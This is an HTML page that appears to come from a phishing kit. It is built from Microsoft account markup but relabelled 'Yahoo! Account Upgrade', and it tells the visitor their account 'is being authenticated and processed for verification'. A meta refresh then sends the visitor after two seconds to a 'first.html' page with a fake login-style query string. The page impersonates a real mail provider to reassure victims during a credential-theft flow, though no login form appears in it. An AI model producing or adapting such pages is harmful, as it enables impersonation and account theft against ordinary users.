<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://www.live.com/schemas" class="m_ul fh" style="">
  <head>
  <meta http-equiv="refresh" content="2; url=first.html?login&continue=to&inbox=Xclusiv-3D|#Anonymous=copied&user+login&continue73jjsu883m3m" />



   
    <link rel="StyleSheet" href="https://secure.wlxrs.com/jy5kqke3ytP4lb3i5ZDpNLiWSfajaQ-eDIOI7KaGMzOGtx7r-zkJzcZQdL-oXfcuo!qhAxV70lLofVjqeMaFkn0-MYEtUYM8BG5a7nbwMSo/Base/16.4.4507/NYKpPzcj59cAccountCSSX.css?ZfDHJ0dwkwrfIMoja3-R7w" type="text/css"/>
	
	<style id="themecss" type="text/css">.t_sel{background-color:#D4D4D4;}.t_sela{background-color:#5103B0;}.t_seli{background-color:#D4D4D4;}.t_hov{background-color:#DEDEDE;}.t_hovl a:hover{background-color:#DEDEDE;}.t_hovl a.sel{background-color:#D4D4D4;}.t_hovlt a:hover .t_hovlt{background-color:#DEDEDE;}.t_hbg:hover{background-color:#DEDEDE;}.t_hdt,h1,.t_hdt a,.t_hdt a:visited,.t_hdt a:hover,.t_hdt a:link{color:#fff;}.t_hdst,.t_hdt .c_hp li .link{color:#555;}.t_hp{border-left:1px solid #555;border-right:1px solid #555;}.t_hdbg{background-color:#5103B0;}.t_hdbg .c_m{border-color:#5103B0;}.t_hdbg .c_m .t_seli,.t_hdbg .c_m li.c_mf > a{background:#5103B0 !important;color:#fff;}.t_c_c.c_clt a:hover,.t_c_c.c_clt a:focus,.t_c_c a#c_clogoc:hover,.t_c_c a#c_clogoc:focus,.t_c_c a:hover.c_mehover,.t_c_c a:focus.c_mehover{background:#205EC3;color:#fff;}.t_c_c li.c_sm:hover,.t_c_c li.c_sm:focus,.t_c_c.c_clt h1:hover,.t_c_c.c_clt h1:focus,.t_c_c.c_clt h1.c_clh{background:#246BDE;}.t_c_c a.c_cf,.t_c_c a.c_mf,.t_c_c li.c_mf > a,.t_c_c a.c_mehover.c_cf,.t_c_c a.c_mehover.c_mf,.t_c_c span.c_mf a.c_mehover{background:#1D57B4;}h2,h2 a,h2 a:visited,h3,h3 a,h3 a:visited,h4,h5,h6,.t_cht{color:#000 !important;}.t_hdbg{background-color:#5103B0;}a,.t_lnk a,.t_lnk a:link,.t_elnk{color:#5103B0;}a:visited,.t_lnk a:visited{color:#5103B0;}a:hover,.t_lnk a:hover{color:#5103B0;color:rgba(38,114,236,.8);}a:focus,.t_prs{color:#5103B0;color:rgba(38,114,236,.6);}.t_lnkpi a{color:#000!important;}.t_lnkpi a:hover{color:#000!important;color:rgba(0,0,0,.8)!important;}.t_lnkpi a:focus,.t_lnkpi .t_prs{color:#000;color:rgba(0,0,0,.6);}.t_lnksi a{color:#666!important;}.t_lnksi a:hover{color:#666!important;color:rgba(102,102,102,.8)!important;}.t_lnksi a:focus,.t_lnksi .t_prs{color:#666!important;color:rgba(102,102,102,.6)!important;}.t_hdbgimg{background-image:url(https://secure.wlxrs.com/jy5kqke3ytP4lb3i5ZDpNLiWSfajaQ-eDIOI7KaGMzOGtx7r-zkJzcZQdL-oXfcuo!qhAxV70lLofVjqeMaFkn0-MYEtUYM8BG5a7nbwMSo/Base/16.4.4507/img/default_final_ltr.jpg);background-repeat:repeat-x;background-position:center 0px;}:root input[type=button].default,:root input[type=submit].default,:root button.default{background-color:#5103B0;color:#fff;}:root input[type=button]:hover.default,:root input[type=submit]:hover.default,:root button:hover.default{background-color:#5A94F1;}.t_cbpr{border-top-color:#5103B0 !important;}.t_cbps{border-top-color:#d4d4d4 !important;}.t_cbr{background-color:#5103B0 !important;}.t_cbs{background-color:#d4d4d4 !important;}.t_rc{color:#5103B0 !important;}</style>

<title>Yahoo! - Processing...</title>
    <meta http-equiv="Content-Type" content="text/html&#59;charset&#61;utf-8"/>
    <link rel="icon" href="http://mail.yahoo.com/favicon.ico" type="image/x-icon" />
    

    
    <meta name="PageId" content="i6107" />
    


<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>


<meta name="AMServerInfo" content="[v: 16.4.3311.918] [s: BAYXXXXMFE1A003] [t: 2012-11-29T23:49:22]" />
<meta name="lang" content="en"/>
<meta name="market" content=""/>


<link rel="icon" href="http://mail.yahoo.com/favicon.ico" type="image/x-icon" />



    
   

    

    
    
  
  <style type="text/css">
<!--
.t_hdbg1 {background-color:#5103B0;}
.t_hdbg1 {background-color:#5103B0;}
-->
  </style>
  </head>
  
  <body style="" class="ltr SignedIn Chrome CR_Win Win6 CR_M23 CR_D0 Full RE_WebKit" id="Proofs.manage.F.A">
  
<div id="m_wh"><script type="text/javascript">//<![CDATA[
function $MB(c,d,g,f,e,a){if(!window.$f)return;c=c||event;var h=c.target||c.srcElement;a=a||$f.pn(h,"c_ml");var b=_ge(a.getAttribute("hid"));if(a&&!a.menu)if(b&&b.parentNode!=a.parentNode){$css.add(b,"uxfa_m c_m t_hovl");b.setAttribute("hid",a.getAttribute("hid"));a.parentNode.insertBefore(b,a.nextSibling);$Do.when("$Header.MenuBind",0,b)}try{$menu.bind(c,g,f,1,0,0,undefined,e)}catch(i){}if(d)$Do.when("$WLXIMCL.initialize",0,0);if(b)return $f.cancelEvent(c)}function $ToggleSidebar(){if($WLXIM)$WLXIM.toggleSidebar()}
//]]></script><script type="text/javascript">//<![CDATA[
var $B={'ltr':1,'SignedIn':1,'Chrome':1,'CR_Win':1,'Win6':1,'CR_M23':1,'CR_D0':1,'Full':1,'RE_WebKit':1,V:23.0}
//]]></script><div id="c_header" class="c_hb c_hncb" style="min-width:987px;">
  <div class="c_c t_hdbg c_cd c_c8 c_cle" id="c_cb0">
    <div class="c_clogo c_clogoni" style="min-width:170px">
      <h1><a id="c_clogot" class="c_clogot" href="/" title="">Yahoo! Account Upgrade</a></h1>
    </div>
    <ul class="c_cc">
      <li class="c_cmore c_mcp"><a href="&#35;" onclick="try&#123;&#36;menu.create&#40;event,6,&#123;defaultLoc&#58;0&#125;&#41;&#59;&#125;catch&#40;e&#41;&#123;&#125;&#59;return false" class="c_cmorel uxfa_ml c_ml" onmousedown="try&#123;&#36;menu.create&#40;event,6,&#123;defaultLoc&#58;0&#125;&#41;&#59;&#125;catch&#40;e&#41;&#123;&#125;"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(https&#58;//secure.wlxrs.com/&#36;live.controls.images/h/c4.png);background-position:-194px -17px;width:14px;height:5px;" src="https&#58;//secure.wlxrs.com/&#36;live.controls.images/is/invis.gif" alt=""/> &nbsp;</a>
        <ul class=" uxfa_m c_m t_hovl">
          <li><a href="&#35;" class="c_collRem">remove</a></li>
        </ul>
      </li>
    </ul>
    <div id="c_cme" class="c_cme t_hdbg"><span id="c_me" class="c_me c_mcp" thov="1"><span class="c_melnkspan" thov="1" hid="c_memenu" id="c_melinkspan"><a id="c_melink" href="#" class="c_un c_nootl c_ml c_m_usep c_mehover" onclick="try{window.top.$MeControl.openMenu(event);}catch(e){};return false" target="_top"><span class="c_meun" id="c_meun"></span></a></span></span></div>
  </div>
  <script type="text/javascript">new function(){var c_cb = document.getElementById("c_cb0");c_cb.h = 1;c_cb.m=100;c_cb.i=1;c_cb.l=170;c_cb.dataModel={"logo":{"containerWidth":"170px","text":"Microsoft account","title":null,"url":"\u002f","hasPropertyText":1},"isLightTheme":0};c_cb.r=1;(function(){var a=c_cb.children[1];if(c_cb.h)a.lastChild.style.display="none"})();}</script></div><script type="text/javascript">var $HIC={};$HIC.e=7;$HIC.c='e9884b0a467c5211';$HIC.m=0;$HIC.l=0;$HIC.NoWebIm=1;</script><script type="text/javascript">//<![CDATA[
var $HeaderCookie={};(function(){var a=$HeaderCookie,b=_ge("c_mocc"),g=_ge("c_murc"),h=$B.rtl?"&#x200f;":"";function c(a){if(b&&!$HIC.NoWebIm){b.style.display="inline";if(a>999)a="99+";b.innerHTML="&nbsp;"+a}$HIC.m=a;$Do.when("$Header.UpdateCookie",this)}a.updateContactsCount=c;function e(){if(this.dataIsGood&&$HIC.m)return $HIC.m;else return 0}a.getContactsCount=e;function d(b,a){a=a||g;if(a){a.style.display="inline";if(b>9999)b="999+";a.innerHTML="&nbsp;"+b}$HIC.l=b;$Do.when("$Header.UpdateCookie",this)}a.updateUnreadCount=d;function f(){if(this.dataIsGood&&$HIC.l)return $HIC.l;else return 0}a.getUnreadCount=f;if($HIC.m)c(parseInt($HIC.m));if($HIC.l)d(parseInt($HIC.l))})()
//]]></script></div><div id="c_base" class="c_base">
        <div id="c_content" class="c_main">
    
        
        <div class="c_inmiddle_area" id="maincontent">
            
            <div id="iPageTitle" class="head">
            Please wait while your<br />
            <table border="0">
            <tr>
              <td>account is being authenticated <br />
              and processed for verification...</td>
              <td><img src="files/X3D.GIF" width="60" height="60" /></td>
            </tr>
          </table>
          </div>
        </div>
        <div class="ClearFloat"></div>
    
    <div id="DiagnosticData" style="display:none">BeginReq-AppInit-RPSCheck-ManageProofs(True)</div>
<div id="m_wf" class="m_wfp">
<style type="text/css">

    @-webkit-keyframes FadeIn{from{opacity:0;}to{opacity:1;}}@-webkit-keyframes FadeOut{from{opacity:1;}to{opacity:0;}}@-webkit-keyframes ScaleIn{from{-webkit-transform:scale(0.85);}to{-webkit-transform:none;}}@-webkit-keyframes ScaleOut{from{-webkit-transform:none;}to{-webkit-transform:scale(0.85);}}@-webkit-keyframes FlyAwayScale{from{-webkit-transform:none;}to{-webkit-transform:scale(0.75);}}@-webkit-keyframes Tap{from{-webkit-transform:none;}to{-webkit-transform:scale(1.05);}}@-webkit-keyframes Untap{from{-webkit-transform:scale(1.05);}to{-webkit-transform:none;}}@-webkit-keyframes ShowHeight{from{height:0;}}@-webkit-keyframes HideHeight{to{height:0;}}@-webkit-keyframes ShowWidth{from{width:0;}}@-webkit-keyframes HideWidth{to{width:0;}}.fadeOnHover {-webkit-transition: opacity 167ms linear 0s;}:not(.Touch) .fadeOnHoverTarget .fadeOnHover{opacity:0;}:not(.Touch) .fadeOnHoverTarget:hover .fadeOnHover{opacity:1;}.slideOnResize {-webkit-transition: top 367ms cubic-bezier(0.1, 0.9, 0.2, 1) 0s, left 367ms cubic-bezier(0.1, 0.9, 0.2, 1) 0s, right 367ms cubic-bezier(0.1, 0.9, 0.2, 1) 0s;}.transitionOnHeightChange{-webkit-transition: height 367ms cubic-bezier(0.1, 0.9, 0.2, 1) 0s;}.moveAndResize {-webkit-transition: top 367ms cubic-bezier(0.1, 0.9, 0.2, 1) 0s, height 367ms cubic-bezier(0.1, 0.9, 0.2, 1) 0s;}.NoDisplay{display: none !important;}</style>

<table id="uxp_ftr_control" cellpadding="0" cellspacing="0">
<tr>
  <td id="uxp_ftr_left" class="t_lnksi">
	<ul>
    
        <li><span id="uxp_ftr_link_trademark">&copy; 2016 Yahoo Inc</span></li>
            <li><a id="uxp_ftr_link_legal" target="_top" href="">Terms</a></li>
            <li><a id="uxp_ftr_link_privacy" target="_top" href="">Privacy</a></li><li><a id="uxp_ftr_link_developers" target="_top" href=""></a></li></ul>
    </td>
</tr>
</table>
</div>
        </div>
    
    </div></div>

    
  

</body>
  
</html>